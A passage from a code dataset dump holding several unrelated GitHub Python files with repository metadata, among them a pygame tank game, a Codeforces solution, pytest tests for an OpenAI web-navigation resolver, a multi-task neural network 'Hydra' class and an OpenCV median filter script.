keys[pygame.K_SPACE]:\n player_tank.shoot()\n missile_sound.play()\n\n for enemy in enemies[:]:\n enemy.move(enemy_vel)\n enemy.move_missile(-missile_vel, player_tank)\n if random.randrange(0, 4 * FPS) == 1:\n enemy.shoot()\n\n if collide(enemy, player_tank):\n explosion_sound.play()\n player_tank.health -= 10\n enemies.remove(enemy)\n\n elif enemy.x + enemy.get_width() < 0:\n lives -= 1\n enemies.remove(enemy)\n\n player_tank.move_missile(missile_vel, enemies)\n player_tank.missile_collision(enemy.missiles)\n\n\ndef main_menu():\n title_font = pygame.font.SysFont(\"comicsans\", 70)\n run = True\n while run:\n WIN.blit(bg, (0, 0))\n title_label = title_font.render(\"Press the mouse to begin....\", 1, (255, 0, 0))\n WIN.blit(title_label, (width / 2 - title_label.get_width() / 2, height / 2))\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n main()\n pygame.quit()\n\n\nmain_menu()\n","repo_name":"neelangshu007/Tank-War","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18646053306","text":"import math\n\nt = int(input())\nfor i in range(t):\n a, b, c = [int(j) for j in input().split()]\n x = (10 ** (a - 1))\n y = (10 ** (b - 1))\n z = 5\n z = z * (10 ** (c - 1))\n print(x, y + z)\n\n\n # first = min(x, y)\n # second = max(x, y)\n # flag = False\n # w = (first + 1) // 10\n # q = (second + 1) // 10\n # print(w, q)\n ","repo_name":"iambiggsharaf/Codeforces_Solutions","sub_path":"1511B.py","file_name":"1511B.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70144701549","text":"################################################################################\n# Gabe Reder\n# gkreder@gmail.com\n# Github version\n################################################################################\nimport sys\nimport os\nimport dataset\nimport argparse\nfrom aux import prelim\n################################################################################\n\n\n\nif __name__ != '__main__':\n\tsys.exit()\n\nparser = argparse.ArgumentParser(prog='command')\nsubparsers = parser.add_subparsers()\nsubparsers.required = True\nsubparsers.dest = 'command'\n\n# parser for 'add_data' command\nparser_add_prelim= subparsers.add_parser('add_data', help = 'add input data/observations to db')\nparser_add_prelim.add_argument('-d', '--db', type = str, required = True)\nparser_add_prelim.add_argument('--in_file', '-i', type = str, required = True)\nparser_add_prelim.add_argument('--table_name', '-t', type = str, required = True)\n# parser_add_prelim.add_argument('-o', '--formatted_out_file', type = str, required = True)\n\n# parser for 'add_pids' command\nparser_add_pids = subparsers.add_parser('add_pids', help = 'add input list of pubchem IDs to db and create a formatted input file')\nparser_add_pids.add_argument('-d', '--db', type = str, required = True)\nparser_add_pids.add_argument('--pubchem_dir', '-p', type = str, required = True)\nparser_add_pids.add_argument('-i', '--pids_list', type = str, required = True)\nparser_add_pids.add_argument('-m', '--mode', type = str, required = True, choices = ['string', 'file'])\n\n# parser for 'download_pids' command\nparser_add_pids = subparsers.add_parser('download_pids', help = 'download pids to json')\nparser_add_pids.add_argument('--pubchem_dir', '-p', type = str, required = True)\nparser_add_pids.add_argument('-i', '--pids_list', type = str, required = True)\nparser_add_pids.add_argument('-m', '--mode', type = str, required = True, choices = ['string', 'file'])\n\n# parser for 'check' command\nparser_check = subparsers.add_parser('check', help = 'preliminary Check on input list of knowns')\nparser_check.add_argument('-d', '--db', type = str, required = True)\nparser_check.add_argument('--in_file', '-i', type = str, required = True)\nparser_check.add_argument('--pubchem_dir', '-p', type = str, required = True)\nparser_check.add_argument('-v', '--verbose', action='store_true')\n\n# # parser for 'match_input' command\n# parser_check = subparsers.add_parser('match_input', help = 'add ID labels to input file')\n# parser_check.add_argument('-d', '--db', type = str, required = True)\n# parser_check.add_argument('--knowns_file', '-k', type = str, required = True)\n# parser_check.add_argument('-o', '--out_file', required = True)\n\n\nargs = parser.parse_args()\n\nif args.command == 'add_data':\n\tprelim.add_data(args)\nelif args.command == 'add_pids':\n\tprelim.add_pids(args)\nelif args.command == 'check':\n\tprelim.check(args)\n# elif args.command == 'match_input':\n# \tprelim.match_input(args)\nelif args.command == 'download_pids':\n\tprelim.download_pids(args)\nelse:\n\tsys.exit('Error: Unrecognized command - %s' % args.command)","repo_name":"gkreder/pipeline_scripts","sub_path":"0_prelim_top.py","file_name":"0_prelim_top.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73190047786","text":"import pytest\n\nfrom jarvis.actions import action_registry\nfrom jarvis.nlp.openai import openai_action_resolver as OR\nfrom jarvis.nlp.openai import navigation\n\nfrom pprint import PrettyPrinter\n\npp = PrettyPrinter(indent=2)\n\n\n# NOTE: When openai model \"temperature>0\", these tests will occasionally fail\n# as the model incorporates randomness.\n@pytest.mark.parametrize(\n \"question, expected\",\n [\n (\n \"log in to my wall street journal account\",\n \"ChangeURL `www.wsj.com` -> ClickLink `sign in`\"\n ),\n (\n \"goto shopify and create account\",\n \"ChangeURL `shopify.com` -> ClickLink `sign up`\"\n ),\n (\n \"open netflix and login\",\n \"ChangeURL `www.netflix.com` -> ClickLink `sign in`\"\n ),\n (\n \"open target and login\",\n \"ChangeURL `target.com` -> ClickLink `login`\"\n ),\n (\n \"goto tiktok website\",\n \"ChangeURL `tiktok.com`\"\n ),\n (\n \"open circleci select jarvis repo and click staging\",\n \"ChangeURL `circleci.com` -> ClickLink `repository` -> ClickLink `jarvis` -> ClickLink `staging`\"\n )\n ]\n)\ndef test_query_web_navigation_model(question, expected):\n answer = navigation.ask_web_navigation_model(question)\n print(answer)\n assert answer == expected\n\n\n@pytest.mark.parametrize(\n \"answer, expected\",\n [\n (\n \"ChangeURL `www.wsj.com` -> ClickLink `sign in`\",\n [('ChangeURL', 'www.wsj.com'), ('ClickLink', 'sign in')]\n ),\n (\n \"ChangeURL `amazon.com` -> FindSearchBar -> TypeText `ski mask` -> PressKey `enter`\",\n [('ChangeURL', 'amazon.com'), ('FindSearchBar', None), ('TypeText', 'ski mask'), (\"PressKey\", \"enter\")]\n ),\n # (\n # \"ChangeURL `amazon.com` -> FindSearchBar -> \", # Should raise exception but doesn't\n # [('ChangeURL', 'amazon.com'), ('FindSearchBar', None)]\n # ),\n # (\n # \"ChangeURL `amazon.com` FindSearchBar -> \", # Should raise exception but doesn't\n # None,\n # )\n (\n \"`amazon.com` 27862\",\n None, # Indicates raises exception\n ),\n ]\n)\ndef testparse_answer_to_actions(answer, expected):\n if expected is None:\n with pytest.raises(Exception) as excinfo:\n print(excinfo)\n actions = OR.parse_answer_to_actions(answer)\n else:\n actions = OR.parse_answer_to_actions(answer)\n assert actions == expected\n\n\nCMD = \"log in to my wall street journal account\"\nACTIONS = [('ChangeURL', 'www.wsj.com'), ('ClickLink', 'sign in')]\nEXPECTED_CHAIN = {\n 'name': 'log in to my wall street journal account',\n 'phrases': ['log in to my wall street journal account'],\n 'steps': [\n {\n 'class_path': 'jarvis.automation.browser.browser_actions.ChangeURL',\n 'params': {'url': 'www.wsj.com'}\n },\n {\n 'class_path': 'jarvis.automation.browser.browser_actions.ClickLink',\n 'params': {'link_text': 'sign in'}\n }\n ]\n }\n\ndef test_convert_actions_to_chain():\n cmd = CMD\n actions = ACTIONS\n expected = EXPECTED_CHAIN\n action_classes = action_registry.load_action_classes_from_modules(\"jarvis/automation\")\n chain = OR.convert_actions_to_chain(\n cmd=cmd,\n actions=actions,\n action_classes=action_classes\n )\n pp.pprint(chain.to_dict())\n assert chain.to_dict() == expected\n\n\ndef test_infer_action_chain():\n cmd = CMD\n expected = EXPECTED_CHAIN\n action_classes = action_registry.load_action_classes_from_modules(\"jarvis/automation\")\n chain = OR.infer_action_chain(cmd, action_classes)\n pp.pprint(chain.to_dict())\n assert chain.to_dict() == expected\n","repo_name":"cfortuner/jarvis","sub_path":"tests/nlp/openai/test_openai_action_resolver.py","file_name":"test_openai_action_resolver.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2230774780","text":"import math\n\ntotal=0\n\nwith open('data.1') as file:\n filelines= file.readlines()\n print(filelines)\n for i in filelines:\n iszero=False\n f=int(i)\n while iszero == False:\n new_f = (math.floor(f/3)-2)\n f=new_f\n if f <= 0:\n iszero=True\n break\n total = total + f\n \n\nprint(total)","repo_name":"Cmorling/advent-of-code-2019","sub_path":"day_one/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7289575392","text":"import pandas as pd\nfrom glob import glob\nfrom pathlib import Path\nimport numpy as np\nimport h5py\n\npath= '/workspace/hpv_project/roi_feter_aftr_filter_6/TCGA-CV-5443-01Z-00-DX1.h5'\nslide=path.split('/')[-1].split('.')[0]\nwith h5py.File(path, 'r') as f:\n data = f['coords']\n print(f.keys())\n data_record = {'coords':[]}\n for i in range(len(data)):\n \tdata1= data[i]\n \tdata1=data1.tolist()\n \tprint(data1)\n \tdata_record['coords'].append(data1)\ndf = pd.DataFrame(data_record)\n \t#csv_file=slide+'.csv'\ndf.to_csv('testing_file_before.csv', index=False)\n\n","repo_name":"ravigupta131/Data_play","sub_path":"read_h5.py","file_name":"read_h5.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"75158785386","text":"import os\nimport yaml\nimport torch\nimport torch.nn as nn\nfrom copy import deepcopy\nfrom collections import deque\n\n\nclass Controller:\n \"\"\"\n Hydra's block controller. Stores information about its index in the\n blocks list, the execution chain (blocks that should be executed in\n order before this block), and the children blocks of this block.\n\n Attributes:\n index: the index of this block in the Hydra.blocks\n execution_chain: indices of blocks to be executed prior to this\n parent_index: index (in Hydra.blocks) of the parent block\n children_indices: indices (in Hydra.blocks) of the childrens\n task_id: if this block is a head, stores the task_id\n serving_tasks: a dict {task_id: idk_what_this_is}\n \"\"\"\n def __init__(self, index=None):\n self.index = index\n self.execution_chain = [index]\n self.parent_index = None\n self.children_indices = []\n self.task_id = None\n self.serving_tasks = dict()\n\n def stack_on(self, controller):\n \"\"\"Stacks current controller on top of another controller\"\"\"\n prev_chain = controller.execution_chain.copy()\n self.execution_chain = prev_chain + [self.index]\n self.parent_index = controller.index\n controller.children_indices.append(self.index)\n return self\n\n def __str__(self):\n return '({}): parent={}, children={}, serving=[{}]'.format(\n self.index, self.parent_index, self.children_indices,\n ', '.join(str(task_id) for task_id in self.serving_tasks))\n\n def __repr__(self):\n return str(self)\n\n def serialize(self):\n \"\"\"Serialize to ordinary python's dict object\"\"\"\n return self.__dict__\n\n def deserialize(self, serialized_controller):\n \"\"\"Deserialize from a python's dict object\"\"\"\n for k, v in serialized_controller.items():\n setattr(self, k, v)\n return self\n\n\nclass BatchNormPillow(nn.Module):\n \"\"\"\n Customized Batch Normalization, for which we can access the inner\n representation (pre-affine).\n\n Attributes:\n raw_bn: an instance of `nn.BatchNorm_`, with `affine=False`\n weight, bias: gamma and beta coefficients (learnable)\n rep: inner representation (saved if retain_rep is True)\n retain_rep: whether to retain the result of raw_bn\n \"\"\"\n def __init__(self, channels, bn_type='2d'):\n super().__init__()\n if bn_type == '1d':\n self.raw_bn = nn.BatchNorm1d(channels, affine=False)\n elif bn_type == '2d':\n self.raw_bn = nn.BatchNorm2d(channels, affine=False)\n else:\n raise RuntimeError('Only 1D and 2D BN-Pillow are supported')\n\n self.weight = nn.Parameter(torch.empty((channels,)).uniform_())\n self.bias = nn.Parameter(torch.zeros((channels,)))\n self.rep = None\n self.retain_rep = False\n\n def forward(self, x):\n x = self.raw_bn(x)\n if self.retain_rep:\n self.rep = x\n y = torch.transpose(x, 1, -1) * self.weight + self.bias\n return torch.transpose(y, 1, -1)\n\n\nclass Block(nn.Module):\n \"\"\"\n A wrapper around `nn.Module` that holds convenient parameters for the\n Hydra class, which otherwise would be hard to access or require.\n\n Attributes:\n module: an `nn.Module` that we will wrap this around\n with_bn_pillow: whether to put a batch-normalization layer after\n bn_pillow: the batchnorm layer mentioned, created in runtime\n trainable: DO NOT confuse with nn.Module.training (module state)\n \"\"\"\n def __init__(self,\n module,\n bn_pillow_planes=None,\n bn_pillow_type='2d'):\n super().__init__()\n self.add_module('module', module)\n self.trainable = True\n if bn_pillow_planes is not None:\n self.with_bn_pillow = True\n bn_pillow = BatchNormPillow(bn_pillow_planes, bn_pillow_type)\n self.add_module('bn_pillow', bn_pillow)\n else:\n self.with_bn_pillow = False\n\n def forward(self, x, *args, **kwargs):\n y = self.module.forward(x, *args, **kwargs)\n if self.with_bn_pillow:\n if not hasattr(self, 'bn_pillow'):\n pillow_type = '2d' if len(y.shape) == 4 else '1d'\n bn_pillow = BatchNormPillow(y.shape[1], pillow_type)\n device = next(self.module.parameters()).device\n bn_pillow = bn_pillow.to(device)\n self.add_module('bn_pillow', bn_pillow)\n if self.training:\n self.bn_pillow.train()\n else:\n self.bn_pillow.eval()\n return self.bn_pillow.forward(y)\n return y\n\n\nclass Hydra(nn.Module):\n \"\"\"\n A base class for all Multi-Task Neural Networks with hard-shared\n parameters and arbitrary branching schema.\n\n Attributes:\n blocks: a `nn.ModuleList` of building blocks of Hydra\n controllers: a list of controllers accompanying each block\n heads: dictionary {task_id: index} of Hydra's heads\n rep_tensors: stores the tensors at branching points\n branching_points: indices of blocks with more than one children\n \"\"\"\n def __init__(self):\n super().__init__()\n self.blocks = nn.ModuleList()\n self.controllers = list()\n self.heads = dict()\n self.rep_tensors = dict()\n self.branching_points = set()\n\n def add_block(self, module):\n \"\"\"\n Registers a new Hydra block, automatically adds it to the\n self.blocks and the execution graph.\n\n Args:\n module: a `nn.Module` object\n\n Returns:\n a Controller object for newly added block\n \"\"\"\n new_index = len(self.blocks)\n new_controller = Controller(new_index)\n self.blocks.append(module)\n self.controllers.append(new_controller)\n return new_controller\n\n def add_head(self, module, task_id):\n \"\"\"\n Registers a new Hydra block as a \"Head\". Same as the method\n `register_block()`, but adds the controller to self.heads.\n\n Args:\n module: a `nn.Module` object\n task_id: an identifier of the task that the head is solving\n\n Returns:\n a Controller object for newly added block\n \"\"\"\n new_controller = self.add_block(module)\n new_controller.task_id = task_id\n self.heads[task_id] = new_controller.index\n return new_controller\n\n def extra_repr(self):\n \"\"\"\n To be displayed each time one calls `repr()`, together with\n the default output of `nn.Module`.\n \"\"\"\n items = '\\n '.join(str(c) for c in self.controllers)\n controllers = '(block controllers):\\n ' + items\n items = '\\n '.join(\n '({}) -> {}'.format(k, str(c))\n for k, c in self.heads.items())\n heads = '(heads):\\n ' + items\n return controllers + '\\n' + heads\n\n def execution_plan(self, task_ids):\n \"\"\"\n Dynamicaly constructs an execution plan, given the identifiers\n of tasks that we want to perform.\n\n Args:\n task_ids: an identifier, or list of identifiers of tasks\n\n Returns:\n execution_order: a list of indices of modules to be executed\n branching_ids: indices of branching points\n \"\"\"\n if not isinstance(task_ids, list):\n task_ids = [task_ids]\n execution_order = []\n branching_ids = set()\n for task_id in task_ids:\n branching_point = None\n controller = self.controllers[self.heads[task_id]]\n task_exec_chain = controller.execution_chain\n for i, index in enumerate(task_exec_chain):\n if index not in execution_order:\n break\n branching_point = index\n execution_order += task_exec_chain[i:].copy()\n if branching_point is not None:\n branching_ids.add(branching_point)\n return execution_order, branching_ids\n\n def parameters(self,\n recurse=True,\n task_ids=None,\n only_trainable=False):\n \"\"\"\n Returns an iterator over module parameters. If task_ids\n are specified, returns an iterator only over the parameters\n that affects the outputs on those tasks.\n\n Args:\n recurse: whether to yield the parameters of submodules\n task_ids: whether to yield only task-related parameters\n only_trainable: whether to yield only trainable parameters\n\n Yields:\n Parameter: module parameter\n \"\"\"\n if task_ids is None and not only_trainable:\n for param in super().parameters(recurse):\n yield param\n else:\n if task_ids is None:\n task_ids = list(self.heads.keys())\n execution_order, _ = self.execution_plan(task_ids)\n for index in execution_order:\n if only_trainable:\n if not hasattr(self.blocks[index], 'trainable'):\n continue\n if self.blocks[index].trainable is not True:\n continue\n\n for param in self.blocks[index].parameters():\n yield param\n\n def control_blocks(self, task_ids=None):\n \"\"\"\n Yields an iterator over the blocks. If `task_ids` are specified,\n only blocks flowing towards corresponding heads will be yielded.\n \"\"\"\n if task_ids is None:\n for controller, block in zip(self.controllers, self.blocks):\n yield controller, block\n else:\n execution_order, _ = self.execution_plan(task_ids)\n for index in execution_order:\n yield self.controllers[index], self.blocks[index]\n\n def create_branch(self, index, branches, device=None):\n \"\"\"\n Dynamically clones `self.blocks[index]`, and stacks the branches\n specified by `branches` on top of the newly cloned branch.\n\n [Before] [After]\n __ ........... -------O--- ...........\n index / / index\n --O-------O--- branches[0] --O __ branches[0]\n \\__ \\ clone /\n branches[1] -------O--- branches[1]\n\n Args:\n index: index of the block to clone\n branches: indices of block's children to stach on the clone\n device: device to spawn the clone on, can be decided later\n\n Raises:\n ValueError: in case invalid `index` or `branches` are specified\n\n Returns:\n controller: controller object of the newly created branch\n block: module of the newly created branch\n \"\"\"\n if index in self.heads:\n raise ValueError(\"Cannot split Hydra's head.\")\n controller = self.controllers[index]\n for b in branches:\n if b not in controller.children_indices:\n raise ValueError(\"Indices of branches should be in \"\n \"controller's chilred_indices.\")\n are_equal = True\n for b in controller.children_indices:\n if b not in branches:\n are_equal = False\n if are_equal:\n return self.controllers[index], self.blocks[index]\n\n block = self.blocks[index]\n cloned_block = deepcopy(block)\n if device is not None:\n cloned_block = cloned_block.to(device)\n cloned_controller = deepcopy(controller)\n new_index = len(self.controllers)\n cloned_controller.index = new_index\n self.blocks.append(cloned_block)\n self.controllers.append(cloned_controller)\n\n if cloned_controller.parent_index is not None:\n parent = self.controllers[cloned_controller.parent_index]\n parent.children_indices.append(new_index)\n cloned_controller.execution_chain = [\n i if i != index else new_index\n for i in cloned_controller.execution_chain]\n\n controller_deque = deque()\n controller_deque.extend(branches)\n while len(controller_deque) > 0:\n tmp_index = controller_deque.popleft()\n tmp_controller = self.controllers[tmp_index]\n if tmp_controller.parent_index == index:\n tmp_controller.parent_index = new_index\n tmp_controller.execution_chain = [\n i if i != index else new_index\n for i in tmp_controller.execution_chain]\n controller_deque.extend(tmp_controller.children_indices)\n\n controller.children_indices = [\n i for i in controller.children_indices\n if i not in branches]\n cloned_controller.children_indices = branches\n\n controller.serving_tasks = dict()\n for i in controller.children_indices:\n tmp_controller = self.controllers[i]\n controller.serving_tasks.update(\n tmp_controller.serving_tasks)\n cloned_controller.serving_tasks = dict()\n for i in cloned_controller.children_indices:\n tmp_controller = self.controllers[i]\n cloned_controller.serving_tasks.update(\n tmp_controller.serving_tasks)\n\n self.rep_tensors.clear()\n _, self.branching_points = \\\n self.execution_plan(list(self.heads.keys()))\n\n return cloned_controller, cloned_block\n\n def split(self, index, branching_scheme, device):\n \"\"\"\n Splits a Hydra's block into several blocks, according to the\n `branching_scheme`. Results of `split(0, [[1], [2,3], [4,5]])`:\n\n | B | (1) (2) (3) (4) (5) | A | (1) (2) (3) (4) (5)\n | E | | | | | | | F | | | | | |\n | F | +---+---|---+---+ | T | | |---+ |---+\n | O | (0) | E | (0) (6) (7)\n | R | | | R | | | |\n | E | (*) | | (*)--+-------+\n\n Args:\n index: index of the block to split\n branching_scheme: list of list of indices (as example above)\n device: a device to spawn the new branches on\n\n Raises:\n ValueError: in case invalid parameters are specified\n\n Returns:\n controllers: list of controllers of splitted branches\n blocks: list of blocks - the splitted branches\n \"\"\"\n if index not in self.branching_points:\n raise ValueError(\"You can only split layers which indices \"\n \"are in `Hydra.branching_points`.\")\n\n controller = self.controllers[index]\n block = self.blocks[index]\n\n total_branches = set()\n for branch in branching_scheme:\n total_branches.update(set(branch))\n if not total_branches == set(controller.children_indices):\n raise ValueError(\"The union of the branches should be \"\n \"equal to `controller.children_indices`.\")\n\n for i in range(len(branching_scheme)):\n scheme_a = set(branching_scheme[i])\n for j in range(i + 1, len(branching_scheme)):\n scheme_b = set(branching_scheme[j])\n if not scheme_a.isdisjoint(scheme_b):\n raise ValueError(\"The branching schemes should \"\n \"be disjoint to each other.\")\n\n new_controllers, new_blocks = [controller], [block]\n for branch in branching_scheme[1:]:\n tmp_ctrl, tmp_block = self.create_branch(index, branch, device)\n new_controllers.append(tmp_ctrl)\n new_blocks.append(tmp_block)\n return new_controllers, new_blocks\n\n def rip(self, device):\n \"\"\"\n Violently rips the model apart. Below are some example results:\n\n | B | (x) (y) (z) | A | (x) (y) (z)\n | E | | | | | F | | | |\n | F | +--(a) (b) | T | (a) (e) (b)\n | O | | | | E | | | |\n | R | +--(c) | R | +--(c) (d)\n | E | | | | | |\n | | (*) | | +--(*)\n\n Args:\n device: a device to spawn the new branches on, either CPU or GPU\n\n Returns:\n a dict of lists of tuples {index: [(new_index, children_index)]}\n \"\"\"\n indices = list(self.branching_points)\n indices.sort(key=lambda i: len(self.controllers[i].execution_chain))\n\n index_map = dict()\n for index in indices:\n children_indices = self.controllers[index].children_indices\n branching_scheme = [[i] for i in children_indices]\n new_cs, _ = self.split(index, branching_scheme, device)\n index_map[index] = [\n (c.index, i) for c, i in zip(new_cs, children_indices)]\n return index_map\n\n def peel(self, task_ids, device=None):\n \"\"\"\n Peels off a task-specific subnetwork (like a banana). Please note\n that it does NOT copy the paremeters of the `__init__` of your\n network, inherited from Hydra. Results of peel('task_a'):\n\n | O | (task_a) (task_b) | P | (task_a)\n | R | | | | E | |\n | I | +----+----+ | E | +----+\n | G | (0) | L | (0)\n | I | | | E | |\n | N | (*) | D | (*)\n\n Args:\n task_ids: `str` or `list` of `str`, related subnets are peeled\n device: a device to spawn freshly peeled Hydra on\n\n Returns:\n peeled_hydra: A new Hydra that is only related to secified tasks.\n index_map: a dict {old_index: new_index} of block correspondence\n \"\"\"\n execution_order, _ = self.execution_plan(task_ids)\n index_map = dict((idx, i) for i, idx in enumerate(execution_order))\n\n new_hydra = Hydra()\n for index in execution_order:\n controller = self.controllers[index]\n block = self.blocks[index]\n\n new_block = deepcopy(block)\n if device is not None:\n new_block = new_block.to(device)\n if controller.task_id is not None:\n new_hydra.add_head(new_block, controller.task_id)\n else:\n new_hydra.add_block(new_block)\n\n for index in execution_order:\n new_index = index_map[index]\n controller = self.controllers[index]\n new_controller = new_hydra.controllers[new_index]\n\n parent_index = controller.parent_index\n if parent_index is not None:\n new_parent_index = index_map[parent_index]\n new_parent = new_hydra.controllers[new_parent_index]\n new_controller.stack_on(new_parent)\n\n new_hydra.build()\n return new_hydra, index_map\n\n def build(self):\n \"\"\"\n Builds the model. Calculates additional stuffs to make the Hydra\n truly powerful.\n \"\"\"\n for _, head_index in self.heads.items():\n controller = self.controllers[head_index]\n task_id = controller.task_id\n for index in controller.execution_chain:\n idx = len(self.controllers[index].serving_tasks)\n self.controllers[index].serving_tasks[task_id] = idx\n _, self.branching_points = \\\n self.execution_plan(list(self.heads.keys()))\n\n def forward(self,\n input_tensor,\n task_ids,\n retain_tensors=False,\n retain_all=False):\n \"\"\"\n Defines the computation performed at every call. Dynamically\n and automatically decides what to run and in what order.\n\n Args:\n input_tensor: a common input for specified tasks\n task_ids: identifiers of tasks to be executed\n retain_tensors: if True, save branching tensors to rep_tensors\n retain_all: if True, save ALL tensors at rep_tensors\n\n Returns:\n A dictionary {task_id: output} of task-specific outputs\n \"\"\"\n exec_order, branching_ids = self.execution_plan(task_ids)\n x = input_tensor\n outputs = dict()\n for index in exec_order:\n controller = self.controllers[index]\n parent_index = controller.parent_index\n if parent_index not in branching_ids:\n x = self.blocks[index](x)\n else:\n x = self.blocks[index](self.rep_tensors[parent_index])\n\n if retain_all:\n self.rep_tensors[index] = x\n elif retain_tensors and index in self.branching_points:\n self.rep_tensors[index] = x\n elif index in branching_ids:\n self.rep_tensors[index] = x\n\n if controller.task_id is not None:\n outputs[controller.task_id] = x\n\n if isinstance(task_ids, str):\n return outputs[task_ids]\n return outputs\n\n def serialize(self):\n \"\"\"Serializes the Hydra into dictionary objects.\n\n Returns:\n hydra_serial: a dictionary of Hydra's parameters\n state_dict: a state dict of `nn.Module` object\n \"\"\"\n controller_serializations = [\n c.serialize() for c in self.controllers]\n hydra_serialization = {\n 'controllers': controller_serializations,\n 'heads': self.heads\n }\n return hydra_serialization, self.state_dict()\n\n def deserialize(self, hydra_serialization, state_dict):\n \"\"\"Reads the Hydra from its serialized representation.\n\n Args:\n hydra_serial: a dictionary of Hydra's parameters\n state_dict: a state dict of `nn.Module` object\n\n Returns: self\n \"\"\"\n self.controllers = [\n Controller().deserialize(c)\n for c in hydra_serialization['controllers']\n ]\n self.heads = hydra_serialization['heads']\n self.load_state_dict(state_dict)\n return self\n\n def save(self, basepath):\n \"\"\"\n Saves the Hydra to disc. The hydra will be saved in two parts:\n * basepath.yaml -- stores the Hydra's controllers and heads\n * basepath.pth -- stores the Hydra's weights\n\n Args:\n basepath: a full path to file (without extension) to save to\n \"\"\"\n serialized_hydra, state_dict = self.serialize()\n basepath = os.path.expanduser(basepath)\n yaml_path = basepath + '.yaml'\n with open(yaml_path, 'w') as outfile:\n yaml.dump(serialized_hydra, outfile)\n pth_path = basepath + '.pth'\n torch.save(state_dict, pth_path)\n\n def load(self, basepath):\n \"\"\"\n Loads the Hydra from dist. This will try to find two files:\n * basepath.yaml -- for the Hydra's controllers and heads\n * basepath.pth -- for the Hydra's weights\n\n Returns: self\n \"\"\"\n basepath = os.path.expanduser(basepath)\n yaml_path = basepath + '.yaml'\n with open(yaml_path, 'r') as stream:\n serialized_hydra = yaml.safe_load(stream)\n pth_path = basepath + '.pth'\n state_dict = torch.load(pth_path)\n return self.deserialize(serialized_hydra, state_dict)\n","repo_name":"hav4ik/Hydra","sub_path":"src/models/hydra_base.py","file_name":"hydra_base.py","file_ext":"py","file_size_in_byte":23804,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"37"} +{"seq_id":"27832016041","text":"import numpy as np\nimport cv2 as cv\n\nimg_name = input(\"Please enter the image you want to do by average filter : \")\nimg_color = cv.imread(img_name)\ncv.imwrite('ColoerImage_' + img_name + '.jpg', img_color)\nimg_gray = cv.cvtColor(img_color, cv.COLOR_BGR2GRAY)\ncv.imwrite('GrayImage_' + img_name + '.jpg', img_gray)\n\nimg_row_size, img_col_size = img_gray.shape\nmedian_color = np.zeros((img_row_size, img_col_size, 3))\nmedian_gray = np.zeros((img_row_size, img_col_size))\nunsharp_color = np.zeros((img_row_size, img_col_size, 3))\nunsharp_gray = np.zeros((img_row_size, img_col_size))\n\nfor i in range(1, img_row_size-1):\n for j in range(1, img_col_size-1):\n sort_pixel_gray = [img_gray[i-1][j-1], img_gray[i-1][j], img_gray[i-1][j+1], img_gray[i][j-1],\n img_gray[i][j], img_gray[i][j+1], img_gray[i+1][j-1], img_gray[i+1][j], img_gray[i+1][j+1]]\n sort_pixel_gray = sorted(sort_pixel_gray)\n median_gray[i][j] = sort_pixel_gray[4]\n unsharp_gray[i][j] = img_gray[i][j] - median_gray[i][j]/255\n\n sort_pixel_r = [img_color[i-1][j-1][0], img_color[i-1][j][0], img_color[i-1][j+1][0], img_color[i][j-1][0],\n img_color[i][j][0], img_color[i][j+1][0], img_color[i+1][j-1][0], img_color[i+1][j][0], img_color[i+1][j+1][0]]\n sort_pixel_g = [img_color[i-1][j-1][1], img_color[i-1][j][1], img_color[i-1][j+1][1], img_color[i][j-1][1],\n img_color[i][j][1], img_color[i][j+1][1], img_color[i+1][j-1][1], img_color[i+1][j][1], img_color[i+1][j+1][1]]\n sort_pixel_b = [img_color[i-1][j-1][2], img_color[i-1][j][2], img_color[i-1][j+1][2], img_color[i][j-1][2],\n img_color[i][j][2], img_color[i][j+1][2], img_color[i+1][j-1][2], img_color[i+1][j][2], img_color[i+1][j+1][2]]\n sort_pixel_r = sorted(sort_pixel_r)\n sort_pixel_g = sorted(sort_pixel_g)\n sort_pixel_b = sorted(sort_pixel_b)\n median_color[i][j][0] = sort_pixel_r[4]\n median_color[i][j][1] = sort_pixel_g[4]\n median_color[i][j][2] = sort_pixel_b[4]\n unsharp_color[i][j][0] = img_color[i][j][0] - median_color[i][j][0]/255\n unsharp_color[i][j][1] = img_color[i][j][1] - median_color[i][j][1]/255\n unsharp_color[i][j][2] = img_color[i][j][2] - median_color[i][j][2]/255\n\n\nmedian_gray = median_gray.astype(np.uint8)\ncv.imwrite('GrayImageMadeByMedianFilter_' + img_name + '.jpg', median_gray)\nmedian_color = median_color.astype(np.uint8)\ncv.imwrite('ColorImageMadeByMedianFilter_' + img_name + '.jpg', median_color)\n\nunsharp_gray = unsharp_gray.astype(np.uint8)\ncv.imwrite('GrayImageMadeByMedianFilterUnsharped_' +\n img_name + '.jpg', unsharp_gray)\nunsharp_color = unsharp_color.astype(np.uint8)\ncv.imwrite('ColorImageMadeByMedianFilterUnsharped_' +\n img_name + '.jpg', unsharp_color)\n\ncv.imshow(\"Origianl Color Image\", img_color)\ncv.imshow(\"Original Gray Image\", img_gray)\ncv.imshow(\"Color Image Made By Median Filter\", median_color)\ncv.imshow(\"Gray Image Made By Median Filter\", median_gray)\ncv.imshow(\"Color Image Made By Median Filter & Unsharped\", unsharp_color)\ncv.imshow(\"Gray Image Made By Median Filter & Unsharped\", unsharp_gray)\ncv.waitKey(0)\ncv.destroyAllWindows()\n","repo_name":"Lyc1103/Image-Processing_Median-Filter","sub_path":"MedianFilter.py","file_name":"MedianFilter.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29033574478","text":"from flask_login import login_required, 